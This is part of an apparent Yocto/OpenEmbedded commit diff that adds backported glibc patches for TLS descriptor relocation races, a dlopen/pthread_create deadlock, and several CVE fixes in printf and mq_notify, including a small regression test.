+ else if (__glibc_likely (r_type == R_X86_64_TLSDESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
+
+- td->arg = (void*)reloc;
+- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)])
+- + map->l_addr);
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
++
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE))
+ {
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..ad0a1147aa
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,124 @@
+From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:40:11 +0000
+Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+On i386 the code is a bit more complicated than on x86_64 because both
+rel and rela relocs are supported.
+---
+ sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++---------------------
+ 1 file changed, 34 insertions(+), 42 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h
+index 23e9cc3bfb..590b41d8d7 100644
+--- a/sysdeps/i386/dl-machine.h
++++ b/sysdeps/i386/dl-machine.h
+@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
+ else if (__glibc_likely (r_type == R_386_TLS_DESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
+-
+- /* Handle relocations that reference the local *ABS* in a simple
+- way, so as to preserve a potential addend. */
+- if (ELF32_R_SYM (reloc->r_info) == 0)
+- td->entry = _dl_tlsdesc_resolve_abs_plus_addend;
+- /* Given a known-zero addend, we can store a pointer to the
+- reloc in the arg position. */
+- else if (td->arg == 0)
+- {
+- td->arg = (void*)reloc;
+- td->entry = _dl_tlsdesc_resolve_rel;
+- }
+- else
+- {
+- /* We could handle non-*ABS* relocations with non-zero addends
+- by allocating dynamically an arg to hold a pointer to the
+- reloc, but that sounds pointless. */
+- const Elf32_Rel *const r = reloc;
+- /* The code below was borrowed from elf_dynamic_do_rel(). */
+- const ElfW(Sym) *const symtab =
+- (const void *) D_PTR (map, l_info[DT_SYMTAB]);
++ const Elf32_Rel *const r = reloc;
++ /* The code below was borrowed from elf_dynamic_do_rel(). */
++ const ElfW(Sym) *const symtab =
++ (const void *) D_PTR (map, l_info[DT_SYMTAB]);
+
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
+ # ifdef RTLD_BOOTSTRAP
+- /* The dynamic linker always uses versioning. */
+- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
++ /* The dynamic linker always uses versioning. */
++ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
+ # else
+- if (map->l_info[VERSYMIDX (DT_VERSYM)])
++ if (map->l_info[VERSYMIDX (DT_VERSYM)])
+ # endif
+- {
+- const ElfW(Half) *const version =
+- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
+- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
+- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
+- &map->l_versions[ndx],
+- (void *) (l_addr + r->r_offset), skip_ifunc);
+- }
++ {
++ const ElfW(Half) *const version =
++ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
++ &map->l_versions[ndx],
++ (void *) (l_addr + r->r_offset), skip_ifunc);
++ }
+ # ifndef RTLD_BOOTSTRAP
+- else
+- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
+- (void *) (l_addr + r->r_offset), skip_ifunc);
++ else
++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
++ (void *) (l_addr + r->r_offset), skip_ifunc);
+ # endif
+- }
+ }
+ else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+ {
+@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map,
+ ;
+ else if (__glibc_likely (r_type == R_386_TLS_DESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
++
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
+
+- td->arg = (void*)reloc;
+- td->entry = _dl_tlsdesc_resolve_rela;
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+ {
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
new file mode 100644
index 0000000000..7a10131bad
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
@@ -0,0 +1,276 @@
+From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 15 Sep 2021 15:16:19 +0100
+Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ
+ #28357]
+
+The fix for bug 19329 caused a regression such that pthread_create can
+deadlock when concurrent ctors from dlopen are waiting for it to finish.
+Use a new GL(dl_load_tls_lock) in pthread_create that is not taken
+around ctors in dlopen.
+
+The new lock is also used in __tls_get_addr instead of GL(dl_load_lock).
+
+The new lock is held in _dl_open_worker and _dl_close_worker around
+most of the logic before/after the init/fini routines. When init/fini
+routines are running then TLS is in a consistent, usable state.
+In _dl_open_worker the new lock requires catching and reraising dlopen
+failures that happen in the critical section.
+
+The new lock is reinitialized in a fork child, to keep the existing
+behaviour and it is kept recursive in case malloc interposition or TLS
+access from signal handlers can retake it. It is not obvious if this
+is necessary or helps, but avoids changing the preexisting behaviour.
+
+The new lock may be more appropriate for dl_iterate_phdr too than
+GL(dl_load_write_lock), since TLS state of an incompletely loaded
+module may be accessed. If the new lock can replace the old one,
+that can be a separate change.
+
+Fixes bug 28357.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c | 6 ++
+ elf/dl-open.c | 35 ++++++++-
+ elf/dl-support.c | 7 ++
+ elf/dl-tls.c | 16 ++---
+ elf/rtld.c | 1 +
+ sysdeps/nptl/fork.c | 3 +
+ sysdeps/generic/ldsodefs.h | 9 ++-
+ 10 files changed, 235 insertions(+), 12 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5]
+Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 93ff5c96e9..cfe0f1c0c9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -551,6 +551,9 @@
+ size_t tls_free_end;
+ tls_free_start = tls_free_end = NO_TLS_OFFSET;
+
++ /* Protects global and module specitic TLS state. */
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
+ /* We modify the list of loaded objects. */
+ __rtld_lock_lock_recursive (GL(dl_load_write_lock));
+
+@@ -786,6 +789,9 @@
+ GL(dl_tls_static_used) = tls_free_start;
+ }
+
++ /* TLS is cleaned up for the unloaded modules. */
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
+ #ifdef SHARED
+ /* Auditing checkpoint: we have deleted all objects. */
+ if (__glibc_unlikely (do_audit))
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 5295e931b0..6ea5dd2457 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -57,6 +57,9 @@
+ (non-negative). */
+ unsigned int original_global_scope_pending_adds;
+
++ /* Set to true if the end of dl_open_worker_begin was reached. */
++ bool worker_continue;
++
+ /* Original parameters to the program and the current environment. */
+ int argc;
+ char **argv;
+@@ -473,7 +473,7 @@
+ }
+
+ static void
+-dl_open_worker (void *a)
++dl_open_worker_begin (void *a)
+ {
+ struct dl_open_args *args = a;
+ const char *file = args->file;
+@@ -747,6 +747,36 @@
+ if (mode & RTLD_GLOBAL)
+ add_to_global_resize (new);
+
++ args->worker_continue = true;
++}
++
++static void
++dl_open_worker (void *a)
++{
++ struct dl_open_args *args = a;
++
++ args->worker_continue = false;
++
++ {
++ /* Protects global and module specific TLS state. */
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
++ struct dl_exception ex;
++ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args);
++
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
++ if (__glibc_unlikely (ex.errstring != NULL))
++ /* Reraise the error. */
++ _dl_signal_exception (err, &ex, NULL);
++ }
++
++ if (!args->worker_continue)
++ return;
++
++ int mode = args->mode;
++ struct link_map *new = args->map;
++
+ /* Run the initializer functions of new objects. Temporarily
+ disable the exception handler, so that lazy binding failures are
+ fatal. */
+diff --git a/elf/dl-support.c b/elf/dl-support.c
+index 02e2ed72f5..d99c1f1d62 100644
+--- a/elf/dl-support.c
++++ b/elf/dl-support.c
+@@ -219,6 +219,13 @@
+ list of loaded objects while an object is added to or removed from
+ that list. */
+ __rtld_lock_define_initialized_recursive (, _dl_load_write_lock)
++/* This lock protects global and module specific TLS related data.
++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++ accessed and when TLS related relocations are processed for a
++ module. It was introduced to keep pthread_create accessing TLS
++ state that is being set up. */
++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock)
+
+
+ #ifdef HAVE_AUX_VECTOR
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index d554ae4497..9260d2d696 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -443,7 +443,7 @@
+ size_t maxgen = 0;
+
+ /* Protects global dynamic TLS related state. */
+- __rtld_lock_lock_recursive (GL(dl_load_lock));
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+
+ /* Check if the current dtv is big enough. */
+ if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+@@ -517,7 +517,7 @@
+ listp = listp->next;
+ assert (listp != NULL);
+ }
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+
+ /* The DTV version is up-to-date now. */
+ dtv[0].counter = maxgen;
+@@ -656,7 +656,7 @@
+
+ Here the dtv needs to be updated to new_gen generation count.
+
+- This code may be called during TLS access when GL(dl_load_lock)
++ This code may be called during TLS access when GL(dl_load_tls_lock)
+ is not held. In that case the user code has to synchronize with
+ dlopen and dlclose calls of relevant modules. A module m is
+ relevant if the generation of m <= new_gen and dlclose of m is
+@@ -778,11 +778,11 @@
+ if (__glibc_unlikely (the_map->l_tls_offset
+ != FORCED_DYNAMIC_TLS_OFFSET))
+ {
+- __rtld_lock_lock_recursive (GL(dl_load_lock));
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+ if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET))
+ {
+ the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET;
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ }
+ else if (__glibc_likely (the_map->l_tls_offset
+ != FORCED_DYNAMIC_TLS_OFFSET))
+@@ -794,7 +794,7 @@
+ #else
+ # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined"
+ #endif
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+
+ dtv[GET_ADDR_MODULE].pointer.to_free = NULL;
+ dtv[GET_ADDR_MODULE].pointer.val = p;
+@@ -802,7 +802,7 @@
+ return (char *) p + GET_ADDR_OFFSET;
+ }
+ else
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ }
+ struct dtv_pointer result = allocate_and_init (the_map);
+ dtv[GET_ADDR_MODULE].pointer = result;
+@@ -873,7 +873,7 @@
+ return NULL;
+
+ dtv_t *dtv = THREAD_DTV ();
+- /* This may be called without holding the GL(dl_load_lock). Reading
++ /* This may be called without holding the GL(dl_load_tls_lock). Reading
+ arbitrary gen value is fine since this is best effort code. */
+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
+ if (__glibc_unlikely (dtv[0].counter != gen))
+diff --git a/elf/rtld.c b/elf/rtld.c
+index 8d2bba3d43..9642eb9c92 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -283,6 +283,7 @@
+ #ifdef _LIBC_REENTRANT
+ ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
++ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ #endif
+ ._dl_nns = 1,
+ ._dl_ns =
+diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c
+index c471f7b15f..021691b9b7 100644
+--- a/sysdeps/nptl/fork.c
++++ b/sysdeps/nptl/fork.c
+@@ -125,6 +125,9 @@
+ /* Reset the lock the dynamic loader uses to protect its data. */
+ __rtld_lock_initialize (GL(dl_load_lock));
+
++ /* Reset the lock protecting dynamic TLS related data. */
++ __rtld_lock_initialize (GL(dl_load_tls_lock));
++
+ /* Run the handlers registered for the child. */
+ __run_fork_handlers (atfork_run_child, multiple_threads);
+ }
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index d49529da0d..9ec1511bb0 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -369,6 +369,13 @@
+ list of loaded objects while an object is added to or removed
+ from that list. */
+ __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock)
++ /* This lock protects global and module specific TLS related data.
++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++ accessed and when TLS related relocations are processed for a
++ module. It was introduced to keep pthread_create accessing TLS
++ state that is being set up. */
++ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock)
+
+ /* Incremented whenever something may have been added to dl_loaded. */
+ EXTERN unsigned long long _dl_load_adds;
+@@ -1153,7 +1160,7 @@
+
+ /* Add module to slot information data. If DO_ADD is false, only the
+ required memory is allocated. Must be called with GL
+- (dl_load_lock) acquired. If the function has already been called
++ (dl_load_tls_lock) acquired. If the function has already been called
+ for the link map L with !do_add, then this function will not raise
+ an exception, otherwise it is possible that it encounters a memory
+ allocation failure. */
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
new file mode 100644
index 0000000000..1e75f2d29d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
@@ -0,0 +1,128 @@
+From 681900d29683722b1cb0a8e565a0585846ec5a61 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 22 Sep 2020 19:07:48 +0200
+Subject: [PATCH] x86: Harden printf against non-normal long double values (bug
+ 26649)
+
+The behavior of isnan/__builtin_isnan on bit patterns that do not
+correspond to something that the CPU would produce from valid inputs
+is currently under-defined in the toolchain. (The GCC built-in and
+glibc disagree.)
+
+The isnan check in PRINTF_FP_FETCH in stdio-common/printf_fp.c
+assumes the GCC behavior that returns true for non-normal numbers
+which are not specified as NaN. (The glibc implementation returns
+false for such numbers.)
+
+At present, passing non-normal numbers to __mpn_extract_long_double
+causes this function to produce irregularly shaped multi-precision
+integers, triggering undefined behavior in __printf_fp_l.
+
+With GCC 10 and glibc 2.32, this behavior is not visible because
+__builtin_isnan is used, which avoids calling
+__mpn_extract_long_double in this case. This commit updates the
+implementation of __mpn_extract_long_double so that regularly shaped
+multi-precision integers are produced in this case, avoiding
+undefined behavior in __printf_fp_l.
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2020-29573
+Signed-off-By: Armin Kuster <akuster@mvista.com>
+
+---
+ sysdeps/x86/Makefile | 4 ++
+ sysdeps/x86/ldbl2mpn.c | 8 ++++
+ sysdeps/x86/tst-ldbl-nonnormal-printf.c | 52 +++++++++++++++++++++++++
+ 3 files changed, 64 insertions(+)
+ create mode 100644 sysdeps/x86/tst-ldbl-nonnormal-printf.c
+
+Index: git/sysdeps/x86/Makefile
+===================================================================
+--- git.orig/sysdeps/x86/Makefile
++++ git/sysdeps/x86/Makefile
+@@ -9,6 +9,10 @@ tests += tst-get-cpu-features tst-get-cp
+ tests-static += tst-get-cpu-features-static
+ endif
+
++ifeq ($(subdir),math)
++tests += tst-ldbl-nonnormal-printf
++endif # $(subdir) == math
++
+ ifeq ($(subdir),setjmp)
+ gen-as-const-headers += jmp_buf-ssp.sym
+ sysdep_routines += __longjmp_cancel
+Index: git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+===================================================================
+--- /dev/null
++++ git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+@@ -0,0 +1,52 @@
++/* Test printf with x86-specific non-normal long double value.
++ Copyright (C) 2020 Free Software Foundation, Inc.
++
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <https://www.gnu.org/licenses/>. */
++
++#include <stdio.h>
++#include <string.h>
++#include <support/check.h>
++
++/* Fill the stack with non-zero values. This makes a crash in
++ snprintf more likely. */
++static void __attribute__ ((noinline, noclone))
++fill_stack (void)
++{
++ char buffer[65536];
++ memset (buffer, 0xc0, sizeof (buffer));
++ asm ("" ::: "memory");
++}
++
++static int
++do_test (void)
++{
++ fill_stack ();
++
++ long double value;
++ memcpy (&value, "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04", 10);
++
++ char buf[30];
++ int ret = snprintf (buf, sizeof (buf), "%Lg", value);
++ TEST_COMPARE (ret, strlen (buf));
++ if (strcmp (buf, "nan") != 0)
++ /* If snprintf does not recognize the non-normal number as a NaN,
++ it has added the missing explicit MSB. */
++ TEST_COMPARE_STRING (buf, "3.02201e-4624");
++ return 0;
++}
++
++#include <support/test-driver.c>
+Index: git/sysdeps/i386/ldbl2mpn.c
+===================================================================
+--- git.orig/sysdeps/i386/ldbl2mpn.c
++++ git/sysdeps/i386/ldbl2mpn.c
+@@ -115,6 +115,12 @@ __mpn_extract_long_double (mp_ptr res_pt
+ && res_ptr[N - 1] == 0)
+ /* Pseudo zero. */
+ *expt = 0;
+-
++ else
++ /* The sign bit is explicit, but add it in case it is missing in
++ the input. Otherwise, callers will not be able to produce the
++ expected multi-precision integer layout by shifting the sign
++ bit into the MSB. */
++ res_ptr[N - 1] |= (mp_limb_t) 1 << (LDBL_MANT_DIG - 1
++ - ((N - 1) * BITS_PER_MP_LIMB));
+ return N;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
new file mode 100644
index 0000000000..7561e87121
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
@@ -0,0 +1,68 @@
+From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001
+From: Andreas Schwab <schwab@linux-m68k.org>
+Date: Thu, 27 May 2021 12:49:47 +0200
+Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896)
+
+Make a deep copy of the pthread attribute object to remove a potential
+use-after-free issue.
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/NEWS b/NEWS
+index 8a20d3c4e3..be489243ac 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ using `glibc' in the "product" field.
+
+ Version 2.31.1
+
++ CVE-2021-33574: The mq_notify function has a potential use-after-free
++ issue when using a notification type of SIGEV_THREAD and a thread
++ attribute with a non-default affinity mask.
++
+ The following bugs are resolved with this release:
+ [14231] stdio-common tests memory requirements
+ [19519] iconv(1) with -c option hangs on illegal multi-byte sequences
+diff --git a/sysdeps/unix/sysv/linux/mq_notify.c b/sysdeps/unix/sysv/linux/mq_notify.c
+index f288bac477..dd47f0b777 100644
+--- a/sysdeps/unix/sysv/linux/mq_notify.c
++++ b/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -135,8 +135,11 @@ helper_thread (void *arg)
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
+- /* The only state we keep is the copy of the thread attributes. */
+- free (data.attr);
++ {
++ /* The only state we keep is the copy of the thread attributes. */
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+ }
+ return NULL;
+ }
+@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+ if (data.attr == NULL)
+ return -1;
+
+- memcpy (data.attr, notification->sigev_notify_attributes,
+- sizeof (pthread_attr_t));
++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
+ }
+
+ /* Construct the new request. */
+@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+
+ /* If it failed, free the allocated memory. */
+ if (__glibc_unlikely (retval != 0))
+- free (data.attr);
++ {
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+
+ return retval;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
new file mode 100644
index 0000000000..396cd7fc0e
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
@@ -0,0 +1,73 @@
+From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 1 Jun 2021 17:51:41 +0200
+Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
+
+__pthread_attr_copy can fail and does not initialize the attribute
+structure in that case.
+
+If __pthread_attr_copy is never called and there is no allocated
+attribute, pthread_attr_destroy should not be called, otherwise
+there is a null pointer dereference in rt/tst-mqueue6.
+
+Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
+("Use __pthread_attr_copy in mq_notify (bug 27896)").
+
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+https://sourceware.org/bugzilla/attachment.cgi?id=13497
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#2
+Signed-off-by: Armin Kuster &lt;akuster@mvista.com&gt;
+
+---
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
+ if (data.attr == NULL)
+ return -1;
+
+- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
++ memcpy (data.attr, notification->sigev_notify_attributes,
++ sizeof (pthread_attr_t));
++
++ struct pthread_attr *source =
++ (struct pthread_attr *) (notification->sigev_notify_attributes);
++ struct pthread_attr *target = (struct pthread_attr *) (data.attr);
++ cpu_set_t *newp;
++ cpu_set_t *cpuset = source->cpuset;
++ size_t cpusetsize = source->cpusetsize;
++
++ /* alloc a new memory for cpuset to avoid use after free */
++ if (cpuset != NULL && cpusetsize > 0)
++ {
++ newp = (cpu_set_t *) malloc (cpusetsize);
++ if (newp == NULL)
++ {
++ free(data.attr);
++ return -1;
++ }
++
++ memcpy (newp, cpuset, cpusetsize);
++ target->cpuset = newp;
++ }
++ else
++ {
++ target->cpuset = NULL;
++ target->cpusetsize = 0;
++ }
+ }
+
+ /* Construct the new request. */
+@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
+ int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
+
+ /* If it failed, free the allocated memory. */
+- if (__glibc_unlikely (retval != 0))
++ if (retval != 0 && data.attr != NULL)
+ {
+ pthread_attr_destroy (data.attr);
+ free (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
new file mode 100644
index 0000000000..36fd4a61b2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
@@ -0,0 +1,41 @@
+From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
+From: Nikita Popov <npv1310@gmail.com>
+Date: Mon, 9 Aug 2021 20:17:34 +0530
+Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
+
+Helper thread frees copied attribute on NOTIFY_REMOVED message
+received from the OS kernel. Unfortunately, it fails to check whether
+copied attribute actually exists (data.attr != NULL). This worked
+earlier because free() checks passed pointer before actually
+attempting to release corresponding memory. But
+__pthread_attr_destroy assumes pointer is not NULL.
+
+So passing NULL pointer to __pthread_attr_destroy will result in
+segmentation fault. This scenario is possible if
+notification->sigev_notify_attributes == NULL (which means default
+thread attributes should be used).
+
+Signed-off-by: Nikita Popov <npv1310@gmail.com>
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-38604
+Signed-off-by: Armin Kuser <akuster@mvista.com>
+
+---
+ sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -134,7 +134,7 @@ helper_thread (void *arg)
+ to wait until it is done with it. */
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
+ {
+ /* The only state we keep is the copy of the thread attributes. */
+ pthread_attr_destroy (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
new file mode 100644
index 0000000000..10c7e5666d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
@@ -0,0 +1,82 @@
+From 952aff5c00ad7c6b83c3f310f2643939538827f8 Mon Sep 17 00:00:00 2001
